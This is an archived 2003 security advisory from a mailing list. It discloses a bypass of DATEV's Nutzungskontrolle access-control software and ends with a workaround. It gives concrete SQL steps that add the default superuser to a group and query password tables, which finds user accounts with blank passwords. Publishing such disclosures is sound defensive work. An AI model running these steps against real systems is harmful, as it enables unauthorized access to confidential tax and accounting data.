lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: t4rku5 at hushmail.com (t4rku5@...hmail.com)
Subject: (no subject)

Topic: DATEV Nutzungskontrolle Bypassing 

Release Date: 2003-10-31


Affected system: 
================ 

- Nutzungskontrolle V.2.2 
- Nutzungskontrolle V.2.1 



Unaffected system: 
================== 

- none known 



Summary: 
======== 

DATEV eG is a German Company, which makes Software for tax advisors and


lawyers. The Nutzungskontrolle (NUKO) is a Software to restrict the 
access for the users. For example, a normal user is not allowed to see

the internal reward accounting data. These data are restrictet by the


NUKO by, for example, blocking the "advisor number", which is used for

all data in the internal reward accounting. 


Issue: 
====== 

It is possible to find out simple or blank passwords in the NUKO, by

searching in the NUKO Database. 

The Problem is that DATEV changed the default database password for all

their databases, except for the NUKO DB. At the moment the Sybase ASA

Database is used to manage this stuff. I will not write the login 
password down here, because i think it is no problem to find this with

google. 

1. First you have to add the default superuser to the group DATEV: 

example: 

GRANT MEMBERSHIP 
IN GROUP DATEV 
TO "the superuser login" (without "") 


2. Then just make a query to the table u_nkw_passwords for the colum


nk_password to check where a password hash 

3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D 

is. 


example: 

select nk_user_id from u_nkw_passwords where nk_password = 
'3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D' 


3. Now query the user name of the nk_user_id. 

example: 

select nk_user_name from u_nkw_users where nk_user_id = 'one of the 
userid from 2.' 


4. Now you have a NUKO login with a blank Password. 



Workaround: 
=========== 

Change the default database password. 


Credits: 
======== 

Discovered by t4rku5 




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ